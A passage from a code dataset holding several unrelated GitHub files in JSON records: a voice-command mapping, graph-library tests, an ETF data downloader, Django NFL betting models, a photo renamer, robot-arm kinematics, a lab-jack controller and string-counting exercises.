\"open_teams_chat\",\n \"description\": \"Open up someones teams chat\",\n \"add_args\": True,\n \"args\": [],\n \"kargs\": {},\n },\n 7: {\n \"method_name\": \"show_help\",\n \"description\": \"Speak out 5 commands you can use\",\n \"add_args\": False,\n \"args\": [\"\"],\n \"kargs\": {},\n },\n 8: {\n \"method_name\": \"show_help\",\n \"description\": \"Speak out all the commands you can use\",\n \"add_args\": False,\n \"args\": [\"all\"],\n \"kargs\": {},\n },\n 9: {\n \"method_name\": \"push_code\",\n \"description\": \"Push the code to remote\",\n \"success_message\": \"Successfully pushed the code to remote\",\n \"failure_message\": \"Failed to push the code to remote\",\n \"add_args\": False,\n \"args\": [],\n \"kargs\": {},\n },\n 10: {\n \"method_name\": \"temp_commit_lock_screen\",\n \"description\": \"Commit code and lock the screen\",\n \"success_message\": \"Successfully commted the code\",\n \"failure_message\": \"Failed to commit the code\",\n \"add_args\": False,\n \"args\": [],\n \"kargs\": 
{},\n },\n 11: {\n \"method_name\": \"lock_screen\",\n \"description\": \"Lock the screen\",\n \"success_message\": \"Locked the screen\",\n \"failure_message\": \"Failed to lock the screen\",\n \"add_args\": False,\n \"args\": [],\n \"kargs\": {},\n },\n 12: {\n \"method_name\": \"crack_joke\",\n \"description\": \"crack a random programmer joke\",\n \"success_message\": \"{}\",\n \"speak_args\": True,\n \"add_args\": False,\n \"args\": [],\n \"kargs\": {},\n },\n 13: {\n \"method_name\": \"tell_a_story\",\n \"description\": \"Narrate a random programmer story\",\n \"success_message\": \"{}\",\n \"failure_message\": \"{}\",\n \"speak_args\": True,\n \"add_args\": False,\n \"args\": [],\n \"kargs\": {},\n },\n 14: {\n \"method_name\": \"get_chatbot_response\",\n \"description\": \"Chat with sandy\",\n \"success_message\": \"{}\",\n \"failure_message\": \"{}\",\n \"speak_args\": True,\n \"add_args\": True,\n \"args\": [],\n \"kargs\": {},\n },\n 15: {\n \"method_name\": \"generate_code\",\n \"description\": \"Generate Python code\",\n \"success_message\": \"{}\",\n \"failure_message\": \"{}\",\n \"speak_args\": False,\n \"add_args\": True,\n \"send_code\": True,\n \"args\": [],\n \"kargs\": {},\n },\n}\n\n# these are the commands or keyboards that the recognizer picks up and matches them with the command details\nCOMMAND_MAPPINGS: dict = {\n 1: [\"start build\", \"trigger pipeline build\"],\n 2: [\"create requirements.txt\", \"create requirements file\"],\n 3: [\"get total pipeline runs\"],\n 4: [], # dynamic addition calling someone\n 5: [], # dynamic addition open email\n 6: [], # dynamic addition open teams chat\n 7: [\"show help\", \"help\", \"what are the commands I can use\"],\n 8: [\"help more\", \"list all the commands I can use\"],\n 9: [\"git push\", \"push code\"],\n 10: [\"taking a break\", \"break time\"],\n 11: [\"lock screen\"],\n 12: [\"crack a joke\", \"joke about programmers\", \"make me feel better\"],\n 13: [\"tell a story\", \"story time\"],\n 14: [\"hey sandy\", \"sandy\"],\n 15: [\"hey codex\", \"codex\", \"hey codecs\", \"codecs\", \"cortex\"],\n}\n\n\ndef add_msft_account_to_commands():\n \"\"\"adding users to the command mapping list\"\"\"\n\n for account in MSFT_ACCOUNT_NAME_LIST:\n name = account.get(\"name\")\n\n COMMAND_MAPPINGS.get(4).append(f\"call {name.lower()}\")\n COMMAND_MAPPINGS.get(5).append(f\"mail {name.lower()}\")\n COMMAND_MAPPINGS.get(6).append(f\"open {name.lower()}'s chat\")\n\n\nadd_msft_account_to_commands()\n","repo_name":"Santhoshkumard11/Voice-Collab","sub_path":"python_scripts/_command_mapping.py","file_name":"_command_mapping.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"1560049646","text":"from dataclasses import dataclass\nimport pytest\nfrom GDM.Graph import Graph, Node, Edge\n\ndef test_get_node():\n G = Graph()\n G.add_default_node('1')\n assert G.get_node('1').name == '1'\n with pytest.raises(KeyError):\n G.get_node('2')\n\ndef test_add_node():\n @dataclass\n class TestNode(Node):\n test: int\n\n G = Graph()\n G.add_node(Node('1', 1.9, 1.0, False, set()))\n \n n = G.get_node('1')\n assert n.name == '1'\n assert n.reward == 1.9\n assert n.utility == 1.0\n assert n.is_terminal == False\n\n with pytest.raises(AssertionError):\n G.add_node('21')\n\n with pytest.raises(AssertionError):\n G.add_node('1')\n\n\n G.add_node(TestNode('2', 1.0, 2.0, True, set(), 12))\n assert G.get_node('2').test == 12\n\ndef 
test_remove_node_simple_case():\n G = Graph()\n G.add_default_node('2')\n\n with pytest.raises(AssertionError):\n G.remove_node('1')\n\n G.remove_node('2')\n assert '2' not in G.nodes\n assert len(G.nodes) == 0\n\ndef test_remove_node_outgoing_edges():\n G = Graph()\n G.add_default_node('1')\n for i in range(2, 20):\n G.add_default_node(str(i))\n G.add_default_edge('1', str(i))\n\n assert len(G.nodes) == 19\n assert len(G.edges) == 18\n \n G.remove_node('1')\n assert len(G.nodes) == 18\n assert len(G.edges) == 0\n\ndef test_remove_node_incoming_edges():\n G = Graph()\n G.add_default_node('1')\n for i in range(2, 20):\n G.add_default_node(str(i))\n G.add_default_edge('1', str(i))\n\n for i in range(2, 20):\n G.add_default_edge(str(i), '1')\n \n G.remove_node('1')\n assert len(G.edges) == 0\n for i in range(2, 20):\n assert len(G.neighbors(str(i))) == 0\n\ndef test_remove_noce_edge_probabilities():\n G = Graph()\n G.add_default_node('1')\n G.add_default_node('2')\n G.add_default_node('3')\n G.add_default_node('4')\n\n G.add_default_edge('1', '2', [('2', 0.5), ('3', 0.25), ('4', 0.25)])\n\n G.remove_node('4')\n\n assert '2' in G.neighbors('1')\n assert '4' not in G.neighbors('1')\n\n edge = G.get_edge('1', '2')\n assert ('2', 0.625) in edge.probability\n assert ('3', 0.375) in edge.probability\n\ndef test_get_edge():\n G = Graph()\n G.add_default_node('1')\n G.add_default_node('2')\n G.add_default_edge('1','2')\n\n assert ('1','2') in G.edges\n assert G.get_edge('1','2').tgt == '2'\n\ndef test_custom_edge():\n @dataclass\n class CustomEdge(Edge):\n q: int\n\n G = Graph()\n with pytest.raises(AssertionError):\n G.add_edge('1')\n\n G.add_default_node('1')\n G.add_default_node('2')\n G.add_edge(CustomEdge('1', '2', [('2', 1.0)], 3))\n\n assert ('1', '2') in G.edges\n assert len(G.edges) == 1\n assert G.get_edge('1', '2').q == 3\n assert '2' in G.get_node('1').neighbors\n\n\ndef test_remove_edge():\n print('remove_edge needs to remove tgt_node from src_node\\'s neighbors.')\n\n G = Graph()\n G.add_default_node('a')\n G.add_default_node('b')\n G.add_default_edge('a', 'b')\n assert len(G.edges) == 1\n \n G.remove_edge('a', 'b')\n assert len(G.edges) == 0\n assert len(G.neighbors('a')) == 0\n assert len(G.neighbors('b')) == 0\n\ndef test_neighbors():\n G = Graph()\n G.add_default_node('1')\n G.add_default_node('2')\n G.add_default_node('3')\n \n G.add_default_edge('1', '2')\n G.add_default_edge('1', '3')\n G.add_default_edge('2', '3')\n\n assert '2' in G.neighbors('1')\n assert '3' in G.neighbors('1')\n assert len(G.neighbors('1')) == 2\n\n assert '3' in G.neighbors('2')\n assert len(G.neighbors('2')) == 1\n\n assert len(G.neighbors('3')) == 0\n\ndef test_set_node_utilities():\n G = Graph()\n for i in range(10):\n G.add_default_node(str(i), utility=i)\n\n new_utility_values = {}\n for i in range(10):\n new_utility_values[str(i)] = 0\n assert G.utility(str(i)) == i\n\n G.set_node_utilities(new_utility_values)\n\n for i in range(10):\n assert G.utility(str(i)) == 0\n\ndef test_map_nodes():\n G = Graph()\n for i in range(10):\n G.add_default_node(str(i))\n\n def modifier(n: Node):\n n.reward = 10\n n.is_terminal = True\n\n G.map_nodes(modifier)\n\n for i in range(10):\n key = str(i)\n assert G.reward(key) == 10\n assert G.is_terminal(key) == True\n\ndef test_map_edges():\n @dataclass\n class CustomEdge(Edge):\n q: float = 0\n\n G = Graph()\n G.add_default_node('1')\n G.add_default_node('2')\n G.add_default_node('3')\n\n G.add_edge(CustomEdge('1', '2', [('2', 1.0)]))\n G.add_edge(CustomEdge('1', '3', 
[('3', 1.0)]))\n\n edge: CustomEdge\n for edge in G.edges.values():\n assert edge.q == 0\n\n def adjust_q_values(e: CustomEdge):\n e.q = 10\n\n G.map_edges(adjust_q_values)\n for edge in G.edges.values():\n assert edge.q == 10\n","repo_name":"bi3mer/GDM","sub_path":"Tests/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":4837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39840724272","text":"from pandas_datareader import data\nimport pandas as pd\nimport math\n\n# Names of ETF tickers (can be extended), mentioned below are traded on eToro\ntickers = ['AAXJ', 'ACWI', 'AGG', 'AMLP', 'AOA', 'AOK', 'AOR', 'BIL', 'BKLN', 'BLV', 'BND', 'BSV', 'CORN', 'CQQQ',\n 'DBA', 'DBO', 'DIA', 'DJP', 'DUST', 'DVY', 'EEM', 'EFA', 'EMB', 'ERX', 'EWG', 'EWH', 'EWJ', 'EWL', 'EWN',\n 'EWT', 'EWW', 'EWY', 'EWZ', 'EZU', 'FAS', 'FAZ', 'FEZ', 'FXI', 'GDX', 'GDXJ', 'GLD', 'HDV', 'HYG', 'IAEX.L',\n 'IAU','ABB', 'IDEM.L', 'IEF', 'IEML.L', 'IFFF.L', 'IHI', 'IJH', 'IJJ', 'IJPE.L', 'IJR', 'ILTB', 'IMEU.L',\n 'IMIB.L', 'ISF.L', 'ITOT','ITWN.L', 'IUKP.L', 'IUSA.L', 'IUSG', 'IUSV', 'IVV', 'IVW', 'IWB', 'IWF', 'IWM',\n 'IWN', 'IWO', 'IWR', 'IWS', 'IXJ', 'JNK', 'KBE','KRE', 'LIT', 'LQD', 'MCHI', 'MDY', 'MINT', 'MUB', 'NUGT',\n 'OIH', 'PALL', 'PFF', 'PGX', 'PHYS', 'PPLT', 'PSLV', 'QQQ', 'RSX', 'RWR', 'SCHE', 'SCHF', 'SCHX', 'SCO',\n 'SDIV', 'SDOW', 'SDS', 'SEMB.L', 'SH', 'SHV', 'SHY', 'SKYY', 'SLV', 'SMH', 'SOXL', 'SOXS', 'SOXX', 'SPLV',\n 'SPXL', 'SPXS', 'SPXU', 'SPY', 'SPYG', 'SQQQ', 'SRTY', 'SSO', 'SWDA.L', 'TAN', 'TFI', 'THD', 'TIP', 'TLT',\n 'TMF', 'TNA', 'TQQQ', 'TVIX', 'TZA', 'UCO', 'UDOW', 'UGA', 'UNG', 'UPRO', 'USL', 'USO', 'USRT', 'VB', 'VBK',\n 'VBR', 'VCIT', 'VCSH', 'VEA', 'VEU', 'VFH', 'VGK', 'VGT', 'VHT', 'VIG', 'VNQ', 'VO', 'VOE', 'VONG', 'VOO',\n 'VOOG', 'VOOV', 'VOX', 'VTI', 'VTV', 'VUG', 'VWO', 'VXUS', 'XBI', 'XCX5.L', 'XLB', 'XLE', 'XLF', 'XLI',\n 'XLK', 'XLP', 'XLU', 'XLV', 'XLY', 'XOP', 'XS6R.L', 'YINN']\n\ndef getData(start: str, end: str, type: str):\n \"\"\"\n Function to download data for Master Thesis from Yahoo! 
Finance database and save it into Excel file.\n \"\"\"\n # DOWNLOAD THE ADJUSTED DAILY PRICES FROM YAHOO DATABASE\n dataset = data.DataReader(tickers, 'yahoo', start, end)[\"Adj Close\"]\n\n print(\"POST-PROCESSING THE DATA\")\n # DATA CLEANING\n # if the first of the last value is nan, delete\n to_drop_name = []\n for i, column in enumerate(dataset.columns):\n try:\n # Do we have data from the beginning?\n if math.isnan(dataset[str(column)][0]):\n to_drop_name.append(column)\n # Do we have data at the end?\n if math.isnan(dataset[str(column)][-1]):\n to_drop_name.append(column)\n except:\n to_drop_name.append(column)\n\n dataset = dataset.drop(columns=to_drop_name, axis=1)\n\n # then loop and test if any data pint is missing, if yes, then manage\n for k in range(len(dataset.columns)):\n for i in range(len(dataset.index)):\n if math.isnan(float(dataset.iloc[i, k])):\n dataset.iloc[i, k] = dataset.iloc[i - 1, k].copy()\n\n if type == 'daily_returns':\n # we got daily prices\n dailyPrices = dataset\n\n # Get daily returns\n dailyReturns = dailyPrices.pct_change().drop(dailyPrices.index[0]) # drop first NaN row\n result = dailyReturns\n\n elif type == 'weekly_returns':\n # we got daily prices\n dailyPrices = dataset\n\n # GET WEEKLY RETURNS\n # Get prices only for Wednesdays and delete Nan columns\n pricesWed = dailyPrices[dailyPrices.index.weekday == 2].dropna(axis=1)\n\n # Get weekly returns\n weeklyReturns = pricesWed.pct_change().drop(pricesWed.index[0]) # drop first NaN row\n result = weeklyReturns\n\n else:\n result = dataset\n\n return result\n\n\nif __name__ == \"__main__\":\n # ** Download the data from Yahoo! **\n # set up: starting date, ending date and type (price, daily_returns, weekly_returns)\n print(\"DOWNLOADING THE DATA, IT CAN TAKE A WHILE\")\n data = getData(start='2021-05-24', end='2021-07-01', type='weekly_returns')\n\n print(\"SAVING INTO EXCEL\")\n # ** save data into excel file **\n data.to_excel(\"yahooData.xlsx\", sheet_name=\"data_for_thesis\")\n\n print(\"THE PROCESS IS DONE\")","repo_name":"VanekPetr/Get_ETF_data_from_Yahoo","sub_path":"extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38295520847","text":"from django.db import models\nfrom django.utils import timezone\nfrom django.contrib.auth import get_user_model\n\nimport csv\nfrom datetime import datetime\n\nimport scripts\n# Create your models here.\nCSV = 'csv_files/nfl_schedule.csv'\n# deployment '/home/kilgoretrout1/nba-picks/csv_files/nfl_schedule.csv'\n\n\nclass Week(models.Model):\n week = models.IntegerField()\n\n def __str__(self):\n return \"Week {}\".format(self.week)\n\n\nclass Game(models.Model):\n week = models.ForeignKey('Week', on_delete=models.CASCADE)\n home_team = models.CharField(max_length=30)\n away_team = models.CharField(max_length=30)\n home_spread = models.FloatField(null=True)\n away_spread = models.FloatField(null=True)\n date_time = models.DateTimeField()\n home_score = models.FloatField(null=True)\n away_score = models.FloatField(null=True)\n\n def __str__(self):\n dt = str(self.date_time)[:11]\n s = f\"{dt} {self.week} {self.away_team} vs. 
{self.home_team}\"\n return s\n\n class Meta:\n ordering = ['pk']\n \n @classmethod\n def create(cls,week, home_team, away_team, date_time):\n game = cls(week=week, home_team=home_team, away_team=away_team, date_time=date_time)\n return game\n\n @classmethod\n def upload_games(cls):\n with open(CSV) as file:\n csv_reader = csv.DictReader(file)\n\n for row in csv_reader:\n\n w = row['week']\n week = Week.objects.get(pk=w)\n home_team = row['home_team']\n away_team = row['away_team']\n\n date = row['date']\n time = row['time']\n dt = date + \" \" + time\n dt_object = datetime.strptime(dt, \"%m/%d/%y %I:%M%p\")\n aware_dt = timezone.make_aware(dt_object)\n\n game = cls.create(week, home_team, away_team, aware_dt )\n game.save()\n\nclass Pick(models.Model):\n\n choices = [('win', 'win'),\n ('loss', 'loss'),\n ('push', 'push')\n ]\n\n user = models.ForeignKey(get_user_model(), on_delete=models.CASCADE, related_name='nfl_pick_user')\n game = models.ForeignKey('Game', on_delete=models.CASCADE)\n pick = models.CharField(max_length=40)\n wager = models.FloatField(null=True, default=0)\n outcome = models.CharField(max_length=5, choices=choices, null=True)\n \n def __str__(self):\n return \"{} | {} {}\".format(self.game, self.user, self.pick)\n\n def get_pick(self):\n points = float(self.pick.split()[-1])\n team = ' '.join(self.pick.split()[:-1])\n if points < 0:\n return \"{} {}\".format(team, points)\n elif points > 0:\n return \"{} +{}\".format(team, points)\n \n def get_outcome(self):\n info = self.pick.split()\n team = \" \".join(info[:-1])\n line = info[-1]\n\n game = self.game\n\n if team == game.home_team:\n score = game.home_score + float(line)\n if score - game.away_score > 0:\n self.outcome = 'win'\n elif score - game.away_score < 0:\n self.outcome = 'loss'\n elif score - game.away_score == 0:\n self.outcome = 'push'\n \n elif team == game.away_team:\n score = game.away_score + float(line)\n if score - game.home_score > 0:\n self.outcome = 'win'\n elif score - game.home_score < 0:\n self.outcome = 'loss'\n elif score - game.home_score == 0:\n self.outcome = 'push'\n\nclass Nfl_Record(models.Model):\n user = models.OneToOneField(get_user_model(), on_delete=models.CASCADE)\n wins = models.PositiveIntegerField(default=0)\n losses = models.PositiveIntegerField(default=0)\n pushes = models.PositiveIntegerField(default=0)\n in_wins = models.PositiveIntegerField(default=0)\n in_losses = models.PositiveIntegerField(default=0)\n in_pushes = models.PositiveIntegerField(default=0)\n\n def __str__(self):\n return f\"{self.user} NFL Record: {self.wins}-{self.losses}-{self.pushes}\"\n\n def update_record(self):\n picks = Pick.objects.filter(user=self.user)\n w = 0\n l = 0\n p = 0\n for pick in picks:\n \n if pick.outcome == 'win':\n w += 1\n elif pick.outcome == 'loss':\n l += 1\n elif pick.outcome == 'push':\n p += 1\n self.wins = w + self.in_wins\n self.losses = l +self.in_losses\n self.pushes = p + self.in_pushes\n\n def get_winning_percentage(self):\n if self.wins + self.losses + self.pushes > 0:\n wp = round(float(self.wins/(self.wins + self.losses) * 100), 1)\n return wp\n else:\n return 0","repo_name":"npally/sports-betting","sub_path":"nfl/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4796,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"15180953584","text":"import ffmpeg\nimport os\nfrom PIL import Image\n\nimgFormats = ['png', 'jpg', 'jpeg']\nvideoFormats = ['m4v', 'mov', 'mp4']\n\ndef date_img(path: str) -> 
str:\n return Image.open(path)._getexif()[36867]\n\ndef date_vid(path: str) -> str:\n return ffmpeg.probe(path)[\"streams\"][1][\"tags\"][\"creation_time\"].replace(\n 'T', ' '\n ).replace(\n '-', ':'\n ).split('.')[0]\n\ndef endswith_one_of_extensions(file: str, extensions: list[str]) -> bool:\n for ext in extensions:\n if file.endswith(ext):\n return True\n return False\n\ndef timestamp_filename(timestamp: str, extension: str) -> str:\n return timestamp.replace(':','').replace(' ', '_') + '.' + extension\n\ndef change_name_until_success(old_filename: str, new_filename: str):\n print('Changing name from: ' + old_filename + ' to: ' + new_filename)\n i = 1\n while True:\n try:\n if i == 1:\n os.rename(old_filename, new_filename)\n break\n else:\n os.rename(\n old_filename, \n new_filename.split('.')[0] + \n ' (' + str(i) + ').' + \n new_filename.split('.')[1]\n )\n break\n except FileExistsError:\n i += 1\n\ndef main():\n for old_filename in os.listdir():\n if not old_filename.endswith('.py'):\n new_filename = ''\n extension = old_filename.split('.')[-1]\n if endswith_one_of_extensions(old_filename.lower(), videoFormats):\n # Working for Redmi Note 8 Pro, maybe other devices\n new_filename = timestamp_filename(date_vid(old_filename), extension)\n if endswith_one_of_extensions(old_filename.lower(), imgFormats):\n new_filename = timestamp_filename(date_img(old_filename), extension)\n change_name_until_success(old_filename, new_filename)\n \n\nif __name__ == \"__main__\":\n main()","repo_name":"BorowiecM127/Filename-to-timestamp-renamer","sub_path":"rename_images_to_timestamps.py","file_name":"rename_images_to_timestamps.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36280899320","text":"\"\"\"\r\nProgram for controlling the Thorlabs lab jack MLJ150/M.\r\nIt moves the lab jack up and down. Check the notice below before use.\r\nnotice:\r\n1. Check the serial number\r\nCheck the 8-digit serial number printed on the body of the device you are using,\r\nand update the serial='' entry given on line 21.\r\n2. Install MSL-Equipment\r\nInstall the module used to control the MLJ150/M.\r\n3. Install Kinesis\r\nDownload Kinesis, the THORLABS library suite.\r\nMake sure the downloaded folder is located at C:/Program Files/Thorlabs/Kinesis.\r\n\r\nFor steps 1-3 above, see the following article:\r\nhttps://qiita.com/opto-line/items/68e144b2ee2e5b733f3d\r\n\"\"\"\r\nimport datetime\r\nimport os\r\nimport sys\r\nimport time \r\n\r\nfrom msl.equipment import Backend, ConnectionRecord, EquipmentRecord\r\nfrom msl.equipment.resources.thorlabs import MotionControl\r\n\r\n# ensure that the Kinesis folder is available on PATH\r\nos.environ['PATH'] += os.pathsep + 'C:/Program Files/Thorlabs/Kinesis'\r\n\r\n# rather than reading the EquipmentRecord from a database we can create it manually\r\nRECORD = EquipmentRecord(\r\n manufacturer='Thorlabs',\r\n model='MLJ150/M', # update the model number for your Integrated Stepper Motor\r\n serial='49907500', # update the serial number for your Integrated Stepper Motor\r\n connection=ConnectionRecord(\r\n backend=Backend.MSL,\r\n address='SDK::Thorlabs.MotionControl.IntegratedStepperMotors.dll',),)\r\n\r\n# When device position is 30000000, absolute position from home is 25mm\r\nCONVFACTOR = 30000000/25\r\n\r\ndef abs_to_dev_pos(abs_pos):\r\n \"\"\"\r\n When device position is 30000000, absolute position from home is 25mm\r\n factor = 30000000/25\r\n \"\"\"\r\n global CONVFACTOR\r\n dev_pos = round(abs_pos*CONVFACTOR)\r\n \r\n return dev_pos\r\n\r\ndef dev_to_abs_pos(dev_pos):\r\n \"\"\"\r\n When device position is 30000000, absolute position from home is 25mm\r\n 
factor = 30000000/25\r\n \"\"\"\r\n global CONVFACTOR\r\n abs_pos = dev_pos*(1/CONVFACTOR)\r\n \r\n return abs_pos\r\n\r\ndef logprint(message=''):\r\n \"\"\"\r\n printing ='on'\r\n print and return None\r\n \"\"\"\r\n form = '[{}, {}]'.format(datetime.datetime.now(), message)\r\n print(form)\r\n\r\ndef jack_status():\r\n\r\n global RECORD\r\n motor = RECORD.connect()\r\n motor.start_polling(200)\r\n logprint(f'Current position: {dev_to_abs_pos(motor.get_position())} [mm]')\r\n logprint(f'Current position: {motor.get_position()} [device units]')\r\n motor.stop_polling()\r\n motor.disconnect()\r\n\r\n return motor.get_position(), dev_to_abs_pos(motor.get_position())\r\n \r\ndef jack_move(abs_pos):\r\n \"\"\"\r\n abs_pos: absolute position from home at unit mm.\r\n\r\n \"\"\"\r\n global RECORD\r\n dev_pos = abs_to_dev_pos(abs_pos)\r\n\r\n # connect to the Integrated Stepper Motor\r\n motor = RECORD.connect()\r\n logprint('connected is success')\r\n \r\n # start polling at 200 ms\r\n motor.start_polling(200)\r\n logprint('jack move..')\r\n \r\n logprint(f'Current position: {dev_to_abs_pos(motor.get_position())} [mm]')\r\n logprint(f'Current position: {motor.get_position()} [device units]')\r\n\r\n # move to position(machine unit)\r\n motor.move_to_position(dev_pos)\r\n print('Moving jack move done.')\r\n\r\n motor.stop_polling()\r\n\r\n # position = motor.get_position()\r\n # real = motor.get_real_value_from_device_unit(position, 'DISTANCE')\r\n # print(' at position {} [device units] {:.3f} [real-world units]'.format(position, real))\r\n\r\n motor.disconnect()\r\n\r\ndef jack_relative_move(abs_shift):\r\n \"\"\"\r\n abs_shift: absolute shift from current position at unit mm.\r\n direction toword home is negative\r\n \r\n \"\"\"\r\n global RECORD\r\n motor = RECORD.connect()\r\n current_dev_pos = motor.get_position()\r\n \r\n dev_shift= abs_to_dev_pos(abs_shift)\r\n\r\n dev_pos = current_dev_pos + dev_shift\r\n\r\n logprint(f'Current position: {dev_to_abs_pos(motor.get_position())} [mm]')\r\n logprint(f'Current position: {motor.get_position()} [device units]')\r\n logprint(f'Shift Value: {dev_shift}[device units]: Goto {dev_pos}[device units]')\r\n\r\n\r\n motor.start_polling(200)\r\n logprint('move...')\r\n # move to position(machine unit)\r\n motor.move_to_position(dev_pos)\r\n\r\n # wait(1)\r\n print('Moving jack move done.')\r\n \r\n\r\n motor.stop_polling()\r\n motor.disconnect()\r\n \r\n\r\ndef jack_home():\r\n \"\"\"\r\n Jack home. Jack move to the home position.\r\n :return:\r\n \"\"\"\r\n global RECORD\r\n print('[', datetime.datetime.now(), ']', 'homing...')\r\n # connect to the Integrated Stepper Motor\r\n motor = RECORD.connect()\r\n # start polling at 200 ms\r\n motor.start_polling(200)\r\n # home the device\r\n motor.home()\r\n\r\n motor.stop_polling()\r\n logprint(f'homing done. 
at position {motor.get_position()} [device units]')\r\n \r\n motor.disconnect()\r\n\r\n\r\n# def _wait(obj):\r\n# obj.clear_message_queue()\r\n# while True:\r\n# status = obj.convert_message(*obj.wait_for_message())['id']\r\n# if status == 'Homed' or status == 'Moved':\r\n# break\r\n# position = obj.get_position()\r\n# real = obj.get_real_value_from_device_unit(position, 'DISTANCE')\r\n# print(' at position {} [device units] {:.3f} [real-world units]'.format(position, real))\r\n\r\n\r\ndef check_device_info():\r\n \"\"\"\r\n Get device info including serial number.\r\n :return:\r\n \"\"\"\r\n print('Building the device list...')\r\n MotionControl.build_device_list()\r\n\r\n n_devices = MotionControl.get_device_list_size()\r\n if n_devices == 0:\r\n print('There are no devices in the device list')\r\n sys.exit(0)\r\n elif n_devices == 1:\r\n print('There is 1 device in the device list')\r\n else:\r\n print('There are {} devices in the device list'.format(n_devices))\r\n\r\n all_devices = MotionControl.get_device_list()\r\n print('The serial numbers of all the devices are: {}'.format(all_devices))\r\n\r\n filter_flippers = MotionControl.get_device_list(MotionControl.Filter_Flipper)\r\n print('The Filter Flipper\\'s that are connected are: {}'.format(filter_flippers))\r\n\r\n lts = MotionControl.get_device_list(MotionControl.Long_Travel_Stage)\r\n print('The Long Travel Stage\\'s that are connected are: {}'.format(lts))\r\n\r\n devices = MotionControl.get_device_list(MotionControl.Filter_Flipper, MotionControl.Long_Travel_Stage)\r\n print('The Filter Flipper\\'s and Long Travel Stage\\'s that are connected are: {}'.format(devices))\r\n\r\n info = MotionControl.get_device_info(all_devices[0])\r\n print('The device info for the device with serial# {} is:'.format(all_devices[0]))\r\n for item in dir(info):\r\n if item.startswith('_'):\r\n continue\r\n print(' {}: {}'.format(item, getattr(info, item)))\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n check_device_info()\r\n # jack_home()\r\n # jack_status()\r\n # jack_move(6.88)\r\n\r\n # jack_status()\r\n # jack_relative_move(1)\r\n # jack_status()\r\n # jack_move(3.27)\r\n \r\n\r\n \r\n \r\n","repo_name":"SGyutan/Thorlabs_ML150M","sub_path":"lab_jack_lib.py","file_name":"lab_jack_lib.py","file_ext":"py","file_size_in_byte":7230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25525286616","text":"import roboticstoolbox as rtb\nfrom numpy import pi, cos, sin, array, ndarray\n\n# UR5e Modified Denavit-Hartenberg parameters\na2 = 0.425\na3 = 0.3922\nd1 = 0.1625\nd4 = 0.1333\nd5 = 0.0997\nd6 = 0.0996\n\n# UR5e kinematics using Robotics Toolbox\nclass UR5e(rtb.DHRobot):\n def __init__(self):\n L1 = rtb.RevoluteMDH(d=d1, a=0, alpha=0)\n L2 = rtb.RevoluteMDH(d=0, a=0, alpha=pi/2)\n L3 = rtb.RevoluteMDH(d=0, a=a2, alpha=0)\n L4 = rtb.RevoluteMDH(d=d4, a=a3, alpha=0)\n L5 = rtb.RevoluteMDH(d=d5, a=0, alpha=pi/2)\n L6 = rtb.RevoluteMDH(d=d6, a=0, alpha=-pi/2)\n super().__init__([L1, L2, L3, L4, L5, L6],name=\"UR5e\")\n\n\n# UR5e Forward kinematics transformation\ndef UR5eFK(j1, j2, j3, j4 , j5, j6):\n T_0_1 = array([[cos(j1), -sin(j1), 0, 0],[sin(j1), cos(j1), 0, 0],[0, 0, 1, d1],[0,0,0,1]])\n T_1_2 = array([[cos(j2), -sin(j2), 0, 0],[0, 0, -1, 0],[sin(j2), cos(j2), 0, 0],[0,0,0,1]])\n T_2_3 = array([[cos(j3), -sin(j3), 0, a2],[sin(j3), cos(j3), 0, 0],[0,0,1,0],[0,0,0,1]])\n T_3_4 = array([[cos(j4), -sin(j4), 0, a3],[sin(j4), cos(j4), 0, 0],[0, 0, 1, d4],[0,0,0,1]])\n T_4_5 = 
array([[cos(j5), -sin(j5), 0, 0],[0,0,-1,-d5],[sin(j5), cos(j5), 0, 0],[0,0,0,1]])\n T_5_6 = array([[cos(j6), -sin(j6), 0, 0],[0,0,1,d6],[-sin(j6),-cos(j6), 0,0],[0,0,0,1]])\n T_0_6 = T_0_1 @ T_1_2 @ T_2_3 @ T_3_4 @ T_4_5 @ T_5_6\n print(ndarray.round(T_0_6,4))\n\n\nsb = UR5e()\nq = [pi/2,0,0,pi/3,0,0]\nprint(\"Forward Kinematics from MDH parameters and Robotics Toolbox:\")\nprint(sb.fkine(q))\nprint(\"Forward Kinematics from manually defined transformation matrices:\")\nUR5eFK(q[0], q[1], q[2], q[3], q[4], q[5])","repo_name":"Daniella1/UR-kinematics","sub_path":"UR5e/UR5e_forward_kinematics.py","file_name":"UR5e_forward_kinematics.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26771950899","text":"# Count Multi X:\n\n# Write a function named count_multi_char_x that takes a string\n# named word and a string named x. This function should do the\n# same thing as the count_char_x function you just wrote - it should\n# return the number of times x appears in word. However, this time,\n# make sure your function works when x is multiple characters long.\n\n# For example, count_multi_char_x(\"Mississippi\", \"iss\") should return 2\n\n# Write your count_multi_char_x function here:\ndef count_multi_char_x(word, x):\n count = 0\n for i in range(len(word) - len(x) + 1):\n if word[i:i + len(x)] == x:\n count += 1\n return count\n\n\n# Uncomment these function calls to test your function:\nprint(count_multi_char_x(\"mississippi\", \"iss\"))\n# should print 2\nprint(count_multi_char_x(\"apple\", \"pp\"))\n# should print 1\n\n\n######## Better Answer in case I need to look at sequence of char #######\n\n\ndef seq_count(string, seq):\n n = len(seq)\n m = len(string)\n count = 0\n for i in range(len(string)):\n if string[i : i + n] == seq:\n count += 1\n return count\n\n\nprint(seq_count(\"issmississippiss\", 